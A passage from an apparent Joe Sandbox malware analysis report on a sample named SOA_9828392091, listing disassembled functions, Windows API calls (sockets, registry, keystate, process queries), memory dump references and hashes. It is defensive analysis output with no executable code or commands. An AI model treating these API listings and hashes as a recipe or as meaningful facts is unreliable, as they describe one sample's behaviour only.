                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                      • String ID: %s%d
                                      • API String ID: 3187004680-1110647743
                                      • Opcode ID: 32d1ea6ff37a1acaa4d5e2e2b398ad79cd8519615f5d8942a8c63b623ae431a9
                                      • Instruction ID: 366e3c515019461a8e0d2f56f2bcd63ef0e438c9ea28449e8b54c32eb83a27ca
                                      • Opcode Fuzzy Hash: 32d1ea6ff37a1acaa4d5e2e2b398ad79cd8519615f5d8942a8c63b623ae431a9
                                      • Instruction Fuzzy Hash: 0B1184B1600209BBCB11BFA08C85FF9376CAF84714F008066FE58AA182DB749545DB70
                                      Function 00991945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009919F3
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00991A26
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00991B49
                                      • CloseHandle.KERNEL32(?), ref: 00991BBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: 6d0210960d073a867aad0d895f51da4ad5c493b4abe5713ee0ca60cd863be10b
                                      • Instruction ID: c25570b38afe71ea37c86e74e73a680d0761c868ec996f68bf17b5d79c4da118
                                      • Opcode Fuzzy Hash: 6d0210960d073a867aad0d895f51da4ad5c493b4abe5713ee0ca60cd863be10b
                                      • Instruction Fuzzy Hash: 06817371A00205ABDF14DF68C886FADBBE5FF48720F148459F905AF382E7B5A941CB90
                                      Function 0099E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0099E1D5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0099E20D
                                      • IsDlgButtonChecked.USER32(?,00000001), ref: 0099E248
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0099E269
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0099E281
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$ButtonCheckedLongWindow
                                      • String ID:
                                      • API String ID: 3188977179-0
                                      • Opcode ID: 36bb5d6a9cf2f7c425a01b45e783cbdbba0735140b55d60d8a0f3fbb32aaf362
                                      • Instruction ID: 1ebeac464a7142f6cf2b6c171c6e6503d1e7ac66c54a159ebeb44d67848291f2
                                      • Opcode Fuzzy Hash: 36bb5d6a9cf2f7c425a01b45e783cbdbba0735140b55d60d8a0f3fbb32aaf362
                                      • Instruction Fuzzy Hash: 14617C38A08248EFDF35CF5CCC95FBA77BAAB89310F184459F959972A1C771A940CB50
                                      Function 00971C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00971CB4
                                      • VariantClear.OLEAUT32(00000013), ref: 00971D26
                                      • VariantClear.OLEAUT32(00000000), ref: 00971D81
                                      • VariantClear.OLEAUT32(?), ref: 00971DF8
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00971E26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      • Opcode ID: f03a46f5a956336b8b1098b4a87ee62aa7f9b2813630b6c2738b8952ae27b60a
                                      • Instruction ID: 566282b809ef8205fc063742cdbf70ad2c336978dad324db532a93f987064a51
                                      • Opcode Fuzzy Hash: f03a46f5a956336b8b1098b4a87ee62aa7f9b2813630b6c2738b8952ae27b60a
                                      • Instruction Fuzzy Hash: 6E5149B5A00209AFDB24CF58C884EAAB7B9FF4C314B158559ED59DB350E730EA51CFA0
                                      Function 00990688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009906EE
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0099077D
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0099079B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 009907E1
                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 009907FB
                                        • Part of subcall function 0094E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0097A574,?,?,00000000,00000008), ref: 0094E675
                                        • Part of subcall function 0094E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0097A574,?,?,00000000,00000008), ref: 0094E699
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      • Opcode ID: e42c00a48ce8c195829106eecfae5c64ad3d7a41ec44e2cef2c36da3fe3864ed
                                      • Instruction ID: 4f70edf68e98c3382ae31a210c5d898769aa6d02f02e1c56e1ae9e50a60b9157
                                      • Opcode Fuzzy Hash: e42c00a48ce8c195829106eecfae5c64ad3d7a41ec44e2cef2c36da3fe3864ed
                                      • Instruction Fuzzy Hash: 3C512975A00209DFCF04EFA8D895AADB7B9BF88320F048055E915AB351DB34ED45CF50
                                      Function 00992E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00992EEF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00992F2E
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00992F75
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00992FA1
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00992FAE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 3740051246-0
                                      • Opcode ID: 826abc39a27740eaf45df863c67b7b600887d47de7c52bf4d61a6fef03c0413e
                                      • Instruction ID: 677308a955e8a090ad07e57b2e396b147a68eb0afc10bd5c4e1f248723b4b0b1
                                      • Opcode Fuzzy Hash: 826abc39a27740eaf45df863c67b7b600887d47de7c52bf4d61a6fef03c0413e
                                      • Instruction Fuzzy Hash: C4511972209204AFDB04EF58C891F6AB7F9FF88314F04891DF59697291DB70E905DB52
                                      Function 00988DE2 Relevance: 7.6, APIs: 5, Instructions: 136networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00988E7C
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988E89
                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00988EAD
                                      • _strlen.LIBCMT ref: 00988EF7
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988F6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_strlenselect
                                      • String ID:
                                      • API String ID: 2217125717-0
                                      • Opcode ID: 18ac66a31989fa1ecedbb25c3cf11138d8a6a6359d573fce0ccf7cb7ef3d817c
                                      • Instruction ID: ffcaf560ca9ef1eeb2d2e9609ea948ee523f214681385d58e4201655610263b2
                                      • Opcode Fuzzy Hash: 18ac66a31989fa1ecedbb25c3cf11138d8a6a6359d573fce0ccf7cb7ef3d817c
                                      • Instruction Fuzzy Hash: 59417071504104ABCB14FBA4DD95FAEB7B9AF88314F504669F51AA7291EF30AE40CB60
                                      Function 0099CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98cd1755a2cfbafa9d9d92dcdfbe6cadd440172ef3d34beca0c16ea030f5fe00
                                      • Instruction ID: 2823d84270e6b757a1f726ecdd0ad3c59f441468559a384ee9e291620d6bc0fe
                                      • Opcode Fuzzy Hash: 98cd1755a2cfbafa9d9d92dcdfbe6cadd440172ef3d34beca0c16ea030f5fe00
                                      • Instruction Fuzzy Hash: 5F41C3B9905208AFDF20DF6CCC44FA9BB6DEB09320F150265F95AA72E1D734AD41DA90
                                      Function 00981206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009812B4
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009812DD
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0098131C
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00981341
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00981349
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      • Opcode ID: ec126a70702c059bbea06d5f253028d682e9a17b038cd4679bf0453587b91174
                                      • Instruction ID: ff02b748827d6a96833e3fedad8081d29e5ce31f6fca6dcc36e7f0b637fcb04a
                                      • Opcode Fuzzy Hash: ec126a70702c059bbea06d5f253028d682e9a17b038cd4679bf0453587b91174
                                      • Instruction Fuzzy Hash: 6A41F975A00105DFCB05EF64C991AAEBBF9FF48314B148099E91AAB361DB31ED01DF51
                                      Function 0094B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(000000FF), ref: 0094B64F
                                      • ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                      • GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                      • GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 2a0d2da8562bac29333dbc6eac637b252a37b19bbaf32275204b3f9370d55329
                                      • Instruction ID: c2199dfaf895967fa9d026d55d54bee7db6819023575e294079efea514225c49
                                      • Opcode Fuzzy Hash: 2a0d2da8562bac29333dbc6eac637b252a37b19bbaf32275204b3f9370d55329
                                      • Instruction Fuzzy Hash: D1416D35509119FFDF159F68C844EEABBB8FB46334F104319F82A96290CB34A994DFA1
                                      Function 0096B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 0096B369
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 0096B413
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0096B41B
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 0096B429
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0096B431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: a9a3350cad51837c70aa49e9c24d4994f0419d08e97c6d8e9f9066fb41c97330
                                      • Instruction ID: 0108a2bc5ee7a332c3c8ffbef51dabd46ffee45fdba8526c449d4a67c9ccef18
                                      • Opcode Fuzzy Hash: a9a3350cad51837c70aa49e9c24d4994f0419d08e97c6d8e9f9066fb41c97330
                                      • Instruction Fuzzy Hash: 9831D171905219EBDF04CF68DE4DA9E3BB9EB04325F104229F921EB2D1E7B09954DB90
                                      Function 0096DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0096DBD7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0096DBF4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0096DC2C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0096DC52
                                      • _wcsstr.LIBCMT ref: 0096DC5C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      • Opcode ID: b12742a5a139bd77b99357590184a72ef596637dc1f67baa78914b08ba51562c
                                      • Instruction ID: 6213ac79c51759dbd6242419aad71567c9e7badfd65b9b21897b4bcd47ed7aae
                                      • Opcode Fuzzy Hash: b12742a5a139bd77b99357590184a72ef596637dc1f67baa78914b08ba51562c
                                      • Instruction Fuzzy Hash: DB212672B09208BBEB159F39DD49E7B7BACDF85760F104039F809CA191EAA5CC01D3A0
                                      Function 00976318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 009350E6: _wcsncpy.LIBCMT ref: 009350FA
                                      • GetFileAttributesW.KERNEL32(?,?,?,?,009760C3), ref: 00976369
                                      • GetLastError.KERNEL32(?,?,?,009760C3), ref: 00976374
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009760C3), ref: 00976388
                                      • _wcsrchr.LIBCMT ref: 009763AA
                                        • Part of subcall function 00976318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009760C3), ref: 009763E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                      • String ID:
                                      • API String ID: 3633006590-0
                                      • Opcode ID: 481b10661ec94151e8281cee1c579aa7481749a3ec1b361a0a295fb5f48c6925
                                      • Instruction ID: 1111b36daf18cccf7ac357fa3d5e539054c373483d40b98509b38970a8943e52
                                      • Opcode Fuzzy Hash: 481b10661ec94151e8281cee1c579aa7481749a3ec1b361a0a295fb5f48c6925
                                      • Instruction Fuzzy Hash: 39212732515A158BDB15EB78AC52FFA33ACEF06760F108466F44DD31C0EB60D984DB51
                                      Function 00988B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0098A82C: inet_addr.WS2_32(00000000), ref: 0098A84E
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00988BD3
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988BE2
                                      • connect.WS2_32(00000000,?,00000010), ref: 00988BFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 3701255441-0
                                      • Opcode ID: b49c84aaad93c4af9e021a888882b443370fda1ff1c7973a6e0b548dc46b66da
                                      • Instruction ID: 8f5a892499463a167cf64df2b51ab0fb65e868bd0ab77e28e58136de4bf3fd1f
                                      • Opcode Fuzzy Hash: b49c84aaad93c4af9e021a888882b443370fda1ff1c7973a6e0b548dc46b66da
                                      • Instruction Fuzzy Hash: 0421AE712002149FCB10AF28C985F7E77ADAF88720F048559F956AB392DF74AC018B61
                                      Function 00988420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00988441
                                      • GetForegroundWindow.USER32 ref: 00988458
                                      • GetDC.USER32(00000000), ref: 00988494
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 009884A0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 009884DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
